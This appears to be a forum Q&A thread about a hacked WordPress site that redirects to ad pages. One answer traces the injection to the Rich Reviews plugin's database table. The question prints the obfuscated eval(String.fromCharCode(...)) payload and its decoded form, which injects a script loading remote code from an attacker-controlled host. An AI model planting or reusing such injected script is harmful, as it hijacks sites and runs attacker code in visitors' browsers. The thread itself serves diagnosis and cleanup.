Reputation: 1715
How to retrive hacked wordpress site
So basically my client's website is hacked, and every time I open, it redirects to another sites (Mostly Ads).
Its Behavior, Every time I run the website, It will automatically change home url and site url.
I tried, I changed home url and site url in cpanel but again I run the site it redirects. and after that it automatically changed to that address in cpanel also.
I am able to access backend after changing url in cpanel until run the frontend. I run a scan with Sucuri plugin it gives me error message below,
11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"
Site address changed for privacy reason. Redirect url is there.
I check every possible files but can't find any suspicious code. Can anyone please help me.
Edit:
After few hours of research I figured out that this injected from a encrypted code below,
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));
When I Decrypted this code(from this site https://malwaredecoder.com/ ), I get this,
eval( (function() {
var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799';
document.getElementsByTagName("head")[0].appendChild(elem);
})(););
Yes! that's the url https://bes.belaterbewasthere.com redirected and throws ad.
Upvotes: 0
Views: 1224
Answers (1)
Reputation: 11
I had the same problem two days ago and had my issue fixed by overwritng the full database with a two weeks old one when the code wasn't there yet. The code was in a table used by Rich Reviews, where it was injected. That plugin is known for this issue and is removed from Wordpress because of it. After removing the plugin also, I was in contact with Google adwords, and they checked if everything was fine now, and it was and they restarted the adwords campaign.
If you don't have an backup, you might try if just deleting the plugin (maybe it is also Rich Reviews) associated with the table where the code is) to solve the issue. The table I had with this issue was rr_options.
Upvotes: 1
Related Questions
- Wordpress Malware - How do I remove it?
- Need to identify malicious code in hacked Wordpress site so I can stop other sites getting hacked
- Malicious JS code in Wordpress change the domain where it is hosted
- How to delete script injected on wordpress site: ads.voipnewswire.net?
- Wordpress site infected with malware
- jQuery.min.php Malware on my site
- Remove infected code from JS files
- Malware on website hxxp looks suspicious
- Find iframe injection and remove from site
- How to clean a hacked wordpress site